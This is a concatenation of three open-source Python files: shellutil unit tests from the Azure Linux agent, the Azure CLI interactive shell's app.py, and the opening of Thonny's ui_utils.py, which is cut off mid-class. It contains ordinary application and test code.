def test_run_command_should_raise_an_exception_when_it_cannot_execute_the_command(self):
self.__it_should_raise_an_exception_when_it_cannot_execute_the_command(
lambda: shellutil.run_command("nonexistent_command"))
def test_run_pipe_should_raise_an_exception_when_it_cannot_execute_the_pipe(self):
self.__it_should_raise_an_exception_when_it_cannot_execute_the_command(
lambda: shellutil.run_pipe([["ls", "-ld", "."], ["nonexistent_command"], ["wc", "-l"]]))
def __it_should_not_log_by_default(self, action):
with patch("azurelinuxagent.common.utils.shellutil.logger", autospec=True) as mock_logger:
try:
action()
except Exception:
pass
self.assertEqual(mock_logger.warn.call_count, 0, "Did not expect any WARNINGS; Got: {0}".format(mock_logger.warn.call_args))
self.assertEqual(mock_logger.error.call_count, 0, "Did not expect any ERRORS; Got: {0}".format(mock_logger.error.call_args))
def test_run_command_it_should_not_log_by_default(self):
self.__it_should_not_log_by_default(
lambda: shellutil.run_command(["ls", "nonexistent_file"])) # Raises a CommandError
self.__it_should_not_log_by_default(
lambda: shellutil.run_command("nonexistent_command")) # Raises an OSError
def test_run_pipe_it_should_not_log_by_default(self):
self.__it_should_not_log_by_default(
lambda: shellutil.run_pipe([["date"], [self.__create_tee_script(return_code=1)]])) # Raises a CommandError
self.__it_should_not_log_by_default(
lambda: shellutil.run_pipe([["date"], ["nonexistent_command"]])) # Raises an OSError
def __it_should_log_an_error_when_log_error_is_set(self, action, command):
with patch("azurelinuxagent.common.utils.shellutil.logger.error") as mock_log_error:
try:
action()
except Exception:
pass
self.assertEqual(mock_log_error.call_count, 1)
args, _ = mock_log_error.call_args
self.assertTrue(any(command in str(a) for a in args), "The command was not logged")
self.assertTrue(any("2" in str(a) for a in args), "The command's return code was not logged") # errno 2: No such file or directory
def test_run_command_should_log_an_error_when_log_error_is_set(self):
self.__it_should_log_an_error_when_log_error_is_set(
lambda: shellutil.run_command(["ls", "file-does-not-exist"], log_error=True), # Raises a CommandError
command="ls")
self.__it_should_log_an_error_when_log_error_is_set(
lambda: shellutil.run_command("command-does-not-exist", log_error=True), # Raises a CommandError
command="command-does-not-exist")
def test_run_command_should_raise_when_both_the_input_and_stdin_parameters_are_specified(self):
with tempfile.TemporaryFile() as input_file:
with self.assertRaises(ValueError):
shellutil.run_command(["cat"], input='0123456789ABCDEF', stdin=input_file)
def test_run_command_should_read_the_command_input_from_the_input_parameter_when_it_is_a_string(self):
command_input = 'TEST STRING'
output = shellutil.run_command(["cat"], input=command_input)
self.assertEqual(output, command_input, "The command did not process its input correctly; the output should match the input")
def test_run_command_should_read_stdin_from_the_input_parameter_when_it_is_a_sequence_of_bytes(self):
command_input = 'TEST BYTES'
output = shellutil.run_command(["cat"], input=command_input)
self.assertEqual(output, command_input, "The command did not process its input correctly; the output should match the input")
def __it_should_read_the_command_input_from_the_stdin_parameter(self, action):
command_input = 'TEST STRING\n'
with tempfile.TemporaryFile() as input_file:
input_file.write(command_input.encode())
input_file.seek(0)
output = action(stdin=input_file)
self.assertEqual(output, command_input, "The command did not process its input correctly; the output should match the input")
def test_run_command_should_read_the_command_input_from_the_stdin_parameter(self):
self.__it_should_read_the_command_input_from_the_stdin_parameter(
lambda stdin: shellutil.run_command(["cat"], stdin=stdin))
def test_run_pipe_should_read_the_command_input_from_the_stdin_parameter(self):
self.__it_should_read_the_command_input_from_the_stdin_parameter(
lambda stdin: shellutil.run_pipe([["cat"], ["sort"]], stdin=stdin))
def __it_should_write_the_command_output_to_the_stdout_parameter(self, action):
with tempfile.TemporaryFile() as output_file:
captured_output = action(stdout=output_file)
output_file.seek(0)
command_output = ustr(output_file.read(), encoding='utf-8', errors='backslashreplace')
self.assertEqual(command_output, "TEST STRING\n", "The command did not produce the correct output; the output should match the input")
self.assertEqual("", captured_output, "No output should have been captured since it was redirected to a file. Output: [{0}]".format(captured_output))
def test_run_command_should_write_the_command_output_to_the_stdout_parameter(self):
self.__it_should_write_the_command_output_to_the_stdout_parameter(
lambda stdout: shellutil.run_command(["echo", "TEST STRING"], stdout=stdout))
def test_run_pipe_should_write_the_command_output_to_the_stdout_parameter(self):
self.__it_should_write_the_command_output_to_the_stdout_parameter(
lambda stdout: shellutil.run_pipe([["echo", "TEST STRING"], ["sort"]], stdout=stdout))
def __it_should_write_the_command_error_output_to_the_stderr_parameter(self, action):
with tempfile.TemporaryFile() as output_file:
action(stderr=output_file)
output_file.seek(0)
command_error_output = ustr(output_file.read(), encoding='utf-8', errors="backslashreplace")
self.assertEqual("TEST STRING\n", command_error_output, "stderr was not redirected to the output file correctly")
def test_run_command_should_write_the_command_error_output_to_the_stderr_parameter(self):
self.__it_should_write_the_command_error_output_to_the_stderr_parameter(
lambda stderr: shellutil.run_command(self.__create_tee_script(), input="TEST STRING\n", stderr=stderr))
def test_run_pipe_should_write_the_command_error_output_to_the_stderr_parameter(self):
self.__it_should_write_the_command_error_output_to_the_stderr_parameter(
lambda stderr: shellutil.run_pipe([["echo", "TEST STRING"], [self.__create_tee_script()]], stderr=stderr))
def test_run_pipe_should_capture_the_stderr_of_all_the_commands_in_the_pipe(self):
with self.assertRaises(shellutil.CommandError) as context_manager:
shellutil.run_pipe([
["echo", "TEST STRING"],
[self.__create_tee_script()],
[self.__create_tee_script()],
[self.__create_tee_script(return_code=1)]])
self.assertEqual("TEST STRING\n" * 3, context_manager.exception.stderr, "Expected 3 copies of the test string since there are 3 commands in the pipe")
def test_run_command_should_return_a_string_by_default(self):
output = shellutil.run_command(self.__create_tee_script(), input="TEST STRING")
self.assertTrue(isinstance(output, ustr), "The return value should be a string. Got: '{0}'".format(type(output)))
def test_run_pipe_should_return_a_string_by_default(self):
output = shellutil.run_pipe([["echo", "TEST STRING"], [self.__create_tee_script()]])
self.assertTrue(isinstance(output, ustr), "The return value should be a string. Got: '{0}'".format(type(output)))
def test_run_command_should_return_a_bytes_object_when_encode_output_is_false(self):
output = shellutil.run_command(self.__create_tee_script(), input="TEST STRING", encode_output=False)
self.assertTrue(isinstance(output, bytes), "The return value should be a bytes object. Got: '{0}'".format(type(output)))
def test_run_pipe_should_return_a_bytes_object_when_encode_output_is_false(self):
output = shellutil.run_pipe([["echo", "TEST STRING"], [self.__create_tee_script()]], encode_output=False)
self.assertTrue(isinstance(output, bytes), "The return value should be a bytes object. Got: '{0}'".format(type(output)))
def test_run_command_run_pipe_run_get_output_should_keep_track_of_the_running_commands(self):
# The children processes run this script, which creates a file with the PIDs of the script and its parent and then sleeps for a long time
child_script = os.path.join(self.tmp_dir, "write_pids.py")
AgentTestCase.create_script(child_script, """
import os
import sys
import time
with open(sys.argv[1], "w") as pid_file:
pid_file.write("{0} {1}".format(os.getpid(), os.getppid()))
time.sleep(120)
""")
threads = []
try:
child_processes = []
parent_processes = []
try:
# each of these files will contain the PIDs of the command that created it and its parent
pid_files = [os.path.join(self.tmp_dir, "pids.txt.{0}".format(i)) for i in range(4)]
# we test these functions in shellutil
commands_to_execute = [
# run_get_output must be the first in this list; see the code to fetch the PIDs a few lines below
lambda: shellutil.run_get_output("{0} {1}".format(child_script, pid_files[0])),
lambda: shellutil.run_command([child_script, pid_files[1]]),
lambda: shellutil.run_pipe([[child_script, pid_files[2]], [child_script, pid_files[3]]]),
]
# start each command on a separate thread (since we need to examine the processes running the commands while they are running)
def invoke(command):
try:
command()
except shellutil.CommandError as command_error:
if command_error.returncode != -9: # test cleanup terminates the commands, so this is expected
raise
for cmd in commands_to_execute:
thread = threading.Thread(target=invoke, args=(cmd,))
thread.start()
threads.append(thread)
# now fetch the PIDs in the files created by the commands, but wait until they are created
if not wait_for(lambda: all(os.path.exists(file) and os.path.getsize(file) > 0 for file in pid_files)):
raise Exception("The child processes did not start within the allowed timeout")
for sig_file in pid_files:
with open(sig_file, "r") as read_handle:
pids = read_handle.read().split()
child_processes.append(int(pids[0]))
parent_processes.append(int(pids[1]))
# the first item to in the PIDs we fetched corresponds to run_get_output, which invokes the command using the
# shell, so in that case we need to use the parent's pid (i.e. the shell that we started)
started_commands = parent_processes[0:1] + child_processes[1:]
# wait for all the commands to start
def all_commands_running():
all_commands_running.running_commands = shellutil.get_running_commands()
return len(all_commands_running.running_commands) >= len(commands_to_execute) + 1 # +1 because run_pipe starts 2 commands
all_commands_running.running_commands = []
if not wait_for(all_commands_running):
self.fail("shellutil.get_running_commands() did not report the expected number of commands after the allowed timeout.\nExpected: {0}\nGot: {1}".format(
format_processes(started_commands), format_processes(all_commands_running.running_commands)))
started_commands.sort()
all_commands_running.running_commands.sort()
self.assertEqual(
started_commands,
all_commands_running.running_commands,
"shellutil.get_running_commands() did not return the expected commands.\nExpected: {0}\nGot: {1}".format(
format_processes(started_commands), format_processes(all_commands_running.running_commands)))
finally:
# terminate the child processes, since they are blocked
for pid in child_processes:
os.kill(pid, signal.SIGKILL)
# once the processes complete, their PIDs should go away
def no_commands_running():
no_commands_running.running_commands = shellutil.get_running_commands()
return len(no_commands_running.running_commands) == 0
no_commands_running.running_commands = []
if not wait_for(no_commands_running):
self.fail("shellutil.get_running_commands() should return empty after the commands complete. Got: {0}".format(
format_processes(no_commands_running.running_commands)))
finally:
for thread in threads:
thread.join(timeout=5)
if __name__ == '__main__':
unittest.main()
|
app.py
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from __future__ import unicode_literals, print_function
import datetime
import json
import math
import os
import re
import subprocess
import sys
from threading import Thread
from six.moves import configparser
from knack.log import get_logger
from knack.util import CLIError
from azure.cli.core._profile import _SUBSCRIPTION_NAME, Profile
from azure.cli.core._session import ACCOUNT, CONFIG, SESSION
from azure.cli.core.api import get_config_dir
from azure.cli.core.util import handle_exception
# pylint: disable=import-error
import jmespath
from prompt_toolkit.auto_suggest import AutoSuggestFromHistory
from prompt_toolkit.buffer import Buffer
from prompt_toolkit.document import Document
from prompt_toolkit.enums import DEFAULT_BUFFER
from prompt_toolkit.filters import Always
from prompt_toolkit.history import FileHistory
from prompt_toolkit.interface import Application, CommandLineInterface
from prompt_toolkit.shortcuts import create_eventloop
# pylint: enable=import-error
from . import VERSION
from .az_completer import AzCompleter
from .az_lexer import get_az_lexer, ExampleLexer, ToolbarLexer
from .configuration import Configuration, SELECT_SYMBOL
from .frequency_heuristic import DISPLAY_TIME, frequency_heuristic
from .gather_commands import add_new_lines, GatherCommands
from .key_bindings import InteractiveKeyBindings
from .layout import LayoutManager
from .progress import progress_view
from . import telemetry
from .threads import LoadCommandTableThread
from .util import get_window_dim, parse_quotes, get_os_clear_screen_word
NOTIFICATIONS = ""
PART_SCREEN_EXAMPLE = .3
START_TIME = datetime.datetime.utcnow()
CLEAR_WORD = get_os_clear_screen_word()
_ENV_ADDITIONAL_USER_AGENT = 'AZURE_HTTP_USER_AGENT'
logger = get_logger(__name__)
def space_toolbar(settings_items, empty_space):
""" formats the toolbar """
counter = 0
for part in settings_items:
counter += len(part)
if len(settings_items) == 1:
spacing = ''
else:
spacing = empty_space[
:int(math.floor((len(empty_space) - counter) / (len(settings_items) - 1)))]
settings = spacing.join(settings_items)
empty_space = empty_space[len(NOTIFICATIONS) + len(settings) + 1:]
return settings, empty_space
# pylint: disable=too-many-instance-attributes
class AzInteractiveShell(object):
def __init__(self, cli_ctx, style=None, completer=None,
lexer=None, history=None,
input_custom=sys.stdin, output_custom=None,
user_feedback=False, intermediate_sleep=.25, final_sleep=4):
from .color_styles import style_factory
self.cli_ctx = cli_ctx
self.config = Configuration(cli_ctx.config, style=style)
self.config.set_style(style)
self.style = style_factory(self.config.get_style())
try:
gathered_commands = GatherCommands(self.config)
self.completer = completer or AzCompleter(self, gathered_commands)
self.completer.initialize_command_table_attributes()
self.lexer = lexer or get_az_lexer(gathered_commands)
except IOError: # if there is no cache
self.completer = AzCompleter(self, None)
self.lexer = None
self.history = history or FileHistory(os.path.join(self.config.get_config_dir(), self.config.get_history()))
if os.environ.get(_ENV_ADDITIONAL_USER_AGENT):
os.environ[_ENV_ADDITIONAL_USER_AGENT] += ' AZURECLISHELL/' + VERSION
else:
os.environ[_ENV_ADDITIONAL_USER_AGENT] = 'AZURECLISHELL/' + VERSION
# OH WHAT FUN TO FIGURE OUT WHAT THESE ARE!
self._cli = None
self.layout = None
self.description_docs = u''
self.param_docs = u''
self.example_docs = u''
self.last = None
self.last_exit = 0
self.user_feedback = user_feedback
self.input = input_custom
self.output = output_custom
self.config_default = ""
self.default_command = ""
self.threads = []
self.curr_thread = None
self.spin_val = -1
self.intermediate_sleep = intermediate_sleep
self.final_sleep = final_sleep
self.command_table_thread = None
# try to consolidate state information here...
# Used by key bindings and layout
self.example_page = 1
self.is_prompting = False
self.is_example_repl = False
self.is_showing_default = False
self.is_symbols = True
def __call__(self):
if self.cli_ctx.data["az_interactive_active"]:
logger.warning("You're in the interactive shell already.")
return
if self.config.BOOLEAN_STATES[self.config.config.get('DEFAULT', 'firsttime')]:
self.config.firsttime()
if not self.config.has_feedback() and frequency_heuristic(self):
print("\n\nAny comments or concerns? You can use the \'feedback\' command!" +
" We would greatly appreciate it.\n")
self.cli_ctx.data["az_interactive_active"] = True
self.run()
self.cli_ctx.data["az_interactive_active"] = False
@property
def cli(self):
""" Makes the interface or refreshes it """
if self._cli is None:
self._cli = self.create_interface()
return self._cli
def handle_cd(self, cmd):
"""changes dir """
if len(cmd) != 2:
print("Invalid syntax: cd path", file=self.output)
return
path = os.path.expandvars(os.path.expanduser(cmd[1]))
try:
os.chdir(path)
except OSError as ex:
print("cd: %s\n" % ex, file=self.output)
def on_input_timeout(self, cli):
"""
brings up the metadata for the command if there is a valid command already typed
"""
document = cli.current_buffer.document
text = document.text
text = text.replace('az ', '')
if self.default_command:
text = self.default_command + ' ' + text
param_info, example = self.generate_help_text()
self.param_docs = u'{}'.format(param_info)
self.example_docs = u'{}'.format(example)
self._update_default_info()
cli.buffers['description'].reset(
initial_document=Document(self.description_docs, cursor_position=0))
cli.buffers['parameter'].reset(
initial_document=Document(self.param_docs))
cli.buffers['examples'].reset(
initial_document=Document(self.example_docs))
cli.buffers['default_values'].reset(
initial_document=Document(
u'{}'.format(self.config_default if self.config_default else 'No Default Values')))
self._update_toolbar()
cli.request_redraw()
def restart_completer(self):
command_info = GatherCommands(self.config)
if not self.completer:
self.completer.start(command_info)
self.completer.initialize_command_table_attributes()
if not self.lexer:
self.lexer = get_az_lexer(command_info)
self._cli = None
def _space_examples(self, list_examples, rows, section_value):
""" makes the example text """
examples_with_index = []
for i, _ in list(enumerate(list_examples)):
if len(list_examples[i]) > 1:
examples_with_index.append("[" + str(i + 1) + "] " + list_examples[i][0] +
list_examples[i][1])
example = "".join(exam for exam in examples_with_index)
num_newline = example.count('\n')
page_number = ''
if num_newline > rows * PART_SCREEN_EXAMPLE and rows > PART_SCREEN_EXAMPLE * 10:
len_of_excerpt = math.floor(float(rows) * PART_SCREEN_EXAMPLE)
group = example.split('\n')
end = int(section_value * len_of_excerpt)
begin = int((section_value - 1) * len_of_excerpt)
if end < num_newline:
example = '\n'.join(group[begin:end]) + "\n"
else:
# default chops top off
example = '\n'.join(group[begin:]) + "\n"
while ((section_value - 1) * len_of_excerpt) > num_newline:
self.example_page -= 1
page_number = '\n' + str(section_value) + "/" + str(int(math.ceil(num_newline / len_of_excerpt)))
return example + page_number + ' CTRL+Y (^) CTRL+N (v)'
def _update_toolbar(self):
cli = self.cli
_, cols = get_window_dim()
cols = int(cols)
empty_space = " " * cols
delta = datetime.datetime.utcnow() - START_TIME
if self.user_feedback and delta.seconds < DISPLAY_TIME:
toolbar = [
' Try out the \'feedback\' command',
'If refreshed disappear in: {}'.format(str(DISPLAY_TIME - delta.seconds))]
elif self.command_table_thread.is_alive():
toolbar = [
' Loading...',
'Hit [enter] to refresh'
]
else:
toolbar = self._toolbar_info()
toolbar, empty_space = space_toolbar(toolbar, empty_space)
cli.buffers['bottom_toolbar'].reset(
initial_document=Document(u'{}{}{}'.format(NOTIFICATIONS, toolbar, empty_space)))
def _toolbar_info(self):
sub_name = ""
try:
profile = Profile(cli_ctx=self.cli_ctx)
sub_name = profile.get_subscription()[_SUBSCRIPTION_NAME]
except CLIError:
pass
curr_cloud = "Cloud: {}".format(self.cli_ctx.cloud.name)
tool_val = 'Subscription: {}'.format(sub_name) if sub_name else curr_cloud
settings_items = [
" [F1]Layout",
"[F2]Defaults",
"[F3]Keys",
"[Ctrl+D]Quit",
tool_val
]
return settings_items
def generate_help_text(self):
""" generates the help text based on commands typed """
param_descrip = example = ""
self.description_docs = u''
rows, _ = get_window_dim()
rows = int(rows)
param_args = self.completer.leftover_args
last_word = self.completer.unfinished_word
command = self.completer.current_command
new_command = ' '.join([command, last_word]).strip()
if not self.completer.complete_command and new_command in self.completer.command_description:
command = new_command
# get command/group help
if self.completer and command in self.completer.command_description:
self.description_docs = u'{}'.format(self.completer.command_description[command])
# get parameter help if full command
if self.completer and command in self.completer.command_param_info:
param = param_args[-1] if param_args else ''
param = last_word if last_word.startswith('-') else param
if param in self.completer.command_param_info[command] and self.completer.has_description(
command + " " + param):
param_descrip = ''.join([
param, ":", '\n', self.completer.param_description.get(command + " " + param, '')])
if command in self.completer.command_examples:
string_example = []
for example in self.completer.command_examples[command]:
for part in example:
string_example.append(part)
''.join(string_example)
example = self._space_examples(
self.completer.command_examples[command], rows, self.example_page)
return param_descrip, example
def _update_default_info(self):
try:
defaults_section = self.cli_ctx.config.defaults_section_name
self.config_default = ""
if hasattr(self.cli_ctx.config, 'config_parser'):
options = self.cli_ctx.config.config_parser.options(defaults_section)
else:
return
for opt in options:
self.config_default += opt + ": " + self.cli_ctx.config.get(defaults_section, opt) + " "
except configparser.NoSectionError:
self.config_default = ""
def create_application(self, full_layout=True):
""" makes the application object and the buffers """
layout_manager = LayoutManager(self)
if full_layout:
layout = layout_manager.create_layout(ExampleLexer, ToolbarLexer)
else:
layout = layout_manager.create_tutorial_layout()
buffers = {
DEFAULT_BUFFER: Buffer(is_multiline=True),
'description': Buffer(is_multiline=True, read_only=True),
'parameter': Buffer(is_multiline=True, read_only=True),
'examples': Buffer(is_multiline=True, read_only=True),
'bottom_toolbar': Buffer(is_multiline=True),
'example_line': Buffer(is_multiline=True),
'default_values': Buffer(),
'symbols': Buffer(),
'progress': Buffer(is_multiline=False)
}
writing_buffer = Buffer(
history=self.history,
auto_suggest=AutoSuggestFromHistory(),
enable_history_search=True,
completer=self.completer,
complete_while_typing=Always()
)
return Application(
mouse_support=False,
style=self.style,
buffer=writing_buffer,
on_input_timeout=self.on_input_timeout,
key_bindings_registry=InteractiveKeyBindings(self).registry,
layout=layout,
buffers=buffers,
)
def create_interface(self):
""" instantiates the interface """
return CommandLineInterface(
application=self.create_application(),
eventloop=create_eventloop())
def set_prompt(self, prompt_command="", position=0):
""" writes the prompt line """
self.description_docs = u'{}'.format(prompt_command)
self.cli.current_buffer.reset(
initial_document=Document(
self.description_docs,
cursor_position=position))
self.cli.request_redraw()
def set_scope(self, value):
""" narrows the scopes the commands """
if self.default_command:
self.default_command += ' ' + value
else:
self.default_command += value
return value
def handle_example(self, text, continue_flag):
""" parses for the tutorial """
cmd = text.partition(SELECT_SYMBOL['example'])[0].rstrip()
num = text.partition(SELECT_SYMBOL['example'])[2].strip()
example = ""
try:
num = int(num) - 1
except ValueError:
print("An Integer should follow the colon", file=self.output)
return ""
if cmd in self.completer.command_examples:
if num >= 0 and num < len(self.completer.command_examples[cmd]):
example = self.completer.command_examples[cmd][num][1]
example = example.replace('\n', '')
else:
print('Invalid example number', file=self.output)
return '', True
example = example.replace('az', '')
starting_index = None
counter = 0
example_no_fill = ""
flag_fill = True
for word in example.split():
if flag_fill:
example_no_fill += word + " "
if word.startswith('-'):
example_no_fill += word + " "
if not starting_index:
starting_index = counter
flag_fill = False
counter += 1
return self.example_repl(example_no_fill, example, starting_index, continue_flag)
def example_repl(self, text, example, start_index, continue_flag):
""" REPL for interactive tutorials """
if start_index:
start_index = start_index + 1
cmd = ' '.join(text.split()[:start_index])
example_cli = CommandLineInterface(
application=self.create_application(
full_layout=False),
eventloop=create_eventloop())
example_cli.buffers['example_line'].reset(
initial_document=Document(u'{}\n'.format(
add_new_lines(example)))
)
while start_index < len(text.split()):
if self.default_command:
cmd = cmd.replace(self.default_command + ' ', '')
example_cli.buffers[DEFAULT_BUFFER].reset(
initial_document=Document(
u'{}'.format(cmd),
cursor_position=len(cmd)))
example_cli.request_redraw()
answer = example_cli.run()
if not answer:
return "", True
answer = answer.text
if answer.strip('\n') == cmd.strip('\n'):
continue
else:
if len(answer.split()) > 1:
start_index += 1
cmd += " " + answer.split()[-1] + " " +\
u' '.join(text.split()[start_index:start_index + 1])
example_cli.exit()
del example_cli
else:
cmd = text
return cmd, continue_flag
# pylint: disable=too-many-statements
def _special_cases(self, cmd, outside):
break_flag = False
continue_flag = False
args = parse_quotes(cmd)
cmd_stripped = cmd.strip()
if not cmd_stripped and cmd:
# add scope if there are only spaces
cmd = self.default_command + " " + cmd
elif cmd_stripped in ("quit", "exit"):
break_flag = True
elif cmd_stripped == "clear-history":
continue_flag = True
self.reset_history()
elif cmd_stripped == CLEAR_WORD:
outside = True
cmd = CLEAR_WORD
elif cmd_stripped[0] == SELECT_SYMBOL['outside']:
cmd = cmd_stripped[1:]
outside = True
if cmd.strip() and cmd.split()[0] == 'cd':
self.handle_cd(parse_quotes(cmd))
continue_flag = True
telemetry.track_outside_gesture()
elif cmd_stripped[0] == SELECT_SYMBOL['exit_code']:
meaning = "Success" if self.last_exit == 0 else "Failure"
print(meaning + ": " + str(self.last_exit), file=self.output)
continue_flag = True
telemetry.track_exit_code_gesture()
elif SELECT_SYMBOL['query'] in cmd_stripped and self.last and self.last.result:
continue_flag = self.handle_jmespath_query(args)
telemetry.track_query_gesture()
elif not args:
continue_flag = True
elif args[0] == '--version' or args[0] == '-v':
try:
continue_flag = True
self.cli_ctx.show_version()
except SystemExit:
pass
elif SELECT_SYMBOL['example'] in cmd:
cmd, continue_flag = self.handle_example(cmd, continue_flag)
telemetry.track_ran_tutorial()
elif SELECT_SYMBOL['scope'] == cmd_stripped[0:2]:
continue_flag, cmd = self.handle_scoping_input(continue_flag, cmd, cmd_stripped)
telemetry.track_scope_changes()
else:
# not a special character; add scope and remove 'az'
if self.default_command:
cmd = self.default_command + " " + cmd
elif cmd.split(' ', 1)[0].lower() == 'az':
cmd = ' '.join(cmd.split()[1:])
if "|" in cmd or ">" in cmd:
# anything I don't parse, send off
outside = True
cmd = "az " + cmd
telemetry.track_cli_commands_used()
return break_flag, continue_flag, outside, cmd
def handle_jmespath_query(self, args):
""" handles the jmespath query for injection or printing """
continue_flag = False
query_symbol = SELECT_SYMBOL['query']
symbol_len = len(query_symbol)
try:
if len(args) == 1:
# if arguments start with query_symbol, just print query result
if args[0] == query_symbol:
result = self.last.result
elif args[0].startswith(query_symbol):
result = jmespath.search(args[0][symbol_len:], self.last.result)
print(json.dumps(result, sort_keys=True, indent=2), file=self.output)
elif args[0].startswith(query_symbol):
# print error message, user unsure of query shortcut usage
print(("Usage Error: " + os.linesep +
"1. Use {0} stand-alone to display previous result with optional filtering "
"(Ex: {0}[jmespath query])" +
os.linesep + "OR:" + os.linesep +
"2. Use {0} to query the previous result for argument values "
"(Ex: group show --name {0}[jmespath query])").format(query_symbol), file=self.output)
else:
# query, inject into cmd
def jmespath_query(match):
if match.group(0) == query_symbol:
return str(self.last.result)
query_result = jmespath.search(match.group(0)[symbol_len:], self.last.result)
return str(query_result)
def sub_result(arg):
escaped_symbol = re.escape(query_symbol)
# regex captures query symbol and all characters following it in the argument
return json.dumps(re.sub(r'%s.*' % escaped_symbol, jmespath_query, arg))
cmd_base = ' '.join(map(sub_result, args))
self.cli_execute(cmd_base)
continue_flag = True
except (jmespath.exceptions.ParseError, CLIError) as e:
print("Invalid Query Input: " + str(e), file=self.output)
continue_flag = True
return continue_flag
def handle_scoping_input(self, continue_flag, cmd, text):
""" handles what to do with a scoping gesture """
default_split = text.partition(SELECT_SYMBOL['scope'])[2].split()
cmd = cmd.replace(SELECT_SYMBOL['scope'], '')
continue_flag = True
if not default_split:
self.default_command = ""
print('unscoping all', file=self.output)
return continue_flag, cmd
while default_split:
if not text:
value = ''
else:
value = default_split[0]
tree_path = self.default_command.split()
tree_path.append(value)
if self.completer.command_tree.in_tree(tree_path):
self.set_scope(value)
print("defaulting: " + value, file=self.output)
cmd = cmd.replace(SELECT_SYMBOL['scope'], '')
elif SELECT_SYMBOL['unscope'] == default_split[0] and self.default_command.split():
value = self.default_command.split()[-1]
self.default_command = ' ' + ' '.join(self.default_command.split()[:-1])
if not self.default_command.strip():
self.default_command = self.default_command.strip()
print('unscoping: ' + value, file=self.output)
elif SELECT_SYMBOL['unscope'] not in text:
print("Scope must be a valid command", file=self.output)
default_split = default_split[1:]
return continue_flag, cmd
def reset_history(self):
history_file_path = os.path.join(self.config.get_config_dir(), self.config.get_history())
os.remove(history_file_path)
self.history = FileHistory(history_file_path)
self.cli.buffers[DEFAULT_BUFFER].history = self.history
def cli_execute(self, cmd):
""" sends the command to the CLI to be executed """
try:
args = parse_quotes(cmd)
if args and args[0] == 'feedback':
self.config.set_feedback('yes')
self.user_feedback = False
azure_folder = get_config_dir()
if not os.path.exists(azure_folder):
os.makedirs(azure_folder)
ACCOUNT.load(os.path.join(azure_folder, 'azureProfile.json'))
CONFIG.load(os.path.join(azure_folder, 'az.json'))
SESSION.load(os.path.join(azure_folder, 'az.sess'), max_age=3600)
invocation = self.cli_ctx.invocation_cls(cli_ctx=self.cli_ctx,
parser_cls=self.cli_ctx.parser_cls,
commands_loader_cls=self.cli_ctx.commands_loader_cls,
help_cls=self.cli_ctx.help_cls)
if '--progress' in args:
args.remove('--progress')
execute_args = [args]
thread = Thread(target=invocation.execute, args=execute_args)
thread.daemon = True
thread.start()
self.threads.append(thread)
self.curr_thread = thread
progress_args = [self]
thread = Thread(target=progress_view, args=progress_args)
thread.daemon = True
thread.start()
self.threads.append(thread)
result = None
else:
result = invocation.execute(args)
self.last_exit = 0
if result and result.result is not None:
if self.output:
self.output.write(result)
self.output.flush()
else:
formatter = self.cli_ctx.output.get_formatter(self.cli_ctx.invocation.data['output'])
self.cli_ctx.output.out(result, formatter=formatter, out_file=sys.stdout)
self.last = result
except Exception as ex: # pylint: disable=broad-except
self.last_exit = handle_exception(ex)
except SystemExit as ex:
self.last_exit = int(ex.code)
def progress_patch(self, _=False):
""" forces to use the Shell Progress """
from .progress import ShellProgressView
self.cli_ctx.progress_controller.init_progress(ShellProgressView())
return self.cli_ctx.progress_controller
def run(self):
""" starts the REPL """
from .progress import ShellProgressView
self.cli_ctx.get_progress_controller().init_progress(ShellProgressView())
self.cli_ctx.get_progress_controller = self.progress_patch
self.command_table_thread = LoadCommandTableThread(self.restart_completer, self)
self.command_table_thread.start()
from .configuration import SHELL_HELP
self.cli.buffers['symbols'].reset(
initial_document=Document(u'{}'.format(SHELL_HELP)))
# flush telemetry for new commands and send successful interactive mode entry event
telemetry.set_success()
telemetry.flush()
while True:
try:
document = self.cli.run(reset_current_buffer=True)
text = document.text
if not text:
# not input
self.set_prompt()
continue
cmd = text
outside = False
except AttributeError:
# when the user pressed Control D
break
except (KeyboardInterrupt, ValueError):
# CTRL C
self.set_prompt()
continue
else:
self.history.append(text)
b_flag, c_flag, outside, cmd = self._special_cases(cmd, outside)
if b_flag:
break
if c_flag:
self.set_prompt()
continue
self.set_prompt()
if outside:
subprocess.Popen(cmd, shell=True).communicate()
else:
telemetry.start()
self.cli_execute(cmd)
if self.last_exit and self.last_exit != 0:
telemetry.set_failure()
else:
telemetry.set_success()
telemetry.flush()
telemetry.conclude()
|
ui_utils.py
|
# -*- coding: utf-8 -*-
from logging import getLogger
import os
import platform
import re
import subprocess
import sys
import textwrap
import threading
import time
import tkinter as tk
import tkinter.font
import traceback
from tkinter import filedialog, messagebox, ttk
from typing import Callable, List, Optional, Tuple, Union # @UnusedImport
from _tkinter import TclError
from thonny import get_workbench, misc_utils, tktextext
from thonny.common import TextRange
from thonny.languages import get_button_padding, tr
from thonny.misc_utils import (
running_on_linux,
running_on_mac_os,
running_on_rpi,
running_on_windows,
)
from thonny.tktextext import TweakableText
PARENS_REGEX = re.compile(r"[\(\)\{\}\[\]]")
logger = getLogger(__name__)
class CommonDialog(tk.Toplevel):
def __init__(self, master=None, cnf={}, **kw):
super().__init__(master=master, cnf=cnf, **kw)
self.bind("<FocusIn>", self._unlock_on_focus_in, True)
def _unlock_on_focus_in(self, event):
if not self.winfo_ismapped():
focussed_widget = self.focus_get()
self.deiconify()
if focussed_widget:
focussed_widget.focus_set()
def get_padding(self):
return ems_to_pixels(2)
def get_internal_padding(self):
return self.get_padding() // 4
class CommonDialogEx(CommonDialog):
def __init__(self, master=None, cnf={}, **kw):
super().__init__(master=master, cnf=cnf, **kw)
# Need to fill the dialog with a frame to gain theme support
self.main_frame = ttk.Frame(self)
self.main_frame.grid(row=0, column=0, sticky="nsew")
self.columnconfigure(0, weight=1)
self.rowconfigure(0, weight=1)
self.bind("<Escape>", self.on_close, True)
self.protocol("WM_DELETE_WINDOW", self.on_close)
def on_close(self, event=None):
self.destroy()
class QueryDialog(CommonDialogEx):
def __init__(
self,
master,
title: str,
prompt: str,
initial_value: str = "",
options: List[str] = [],
entry_width: Optional[int] = None,
):
super().__init__(master)
self.var = tk.StringVar(value=initial_value)
self.result = None
margin = self.get_padding()
spacing = margin // 2
self.title(title)
self.prompt_label = ttk.Label(self.main_frame, text=prompt)
self.prompt_label.grid(row=1, column=1, columnspan=2, padx=margin, pady=(margin, spacing))
if options:
self.entry_widget = ttk.Combobox(
self.main_frame, textvariable=self.var, values=options, height=15, width=entry_width
)
else:
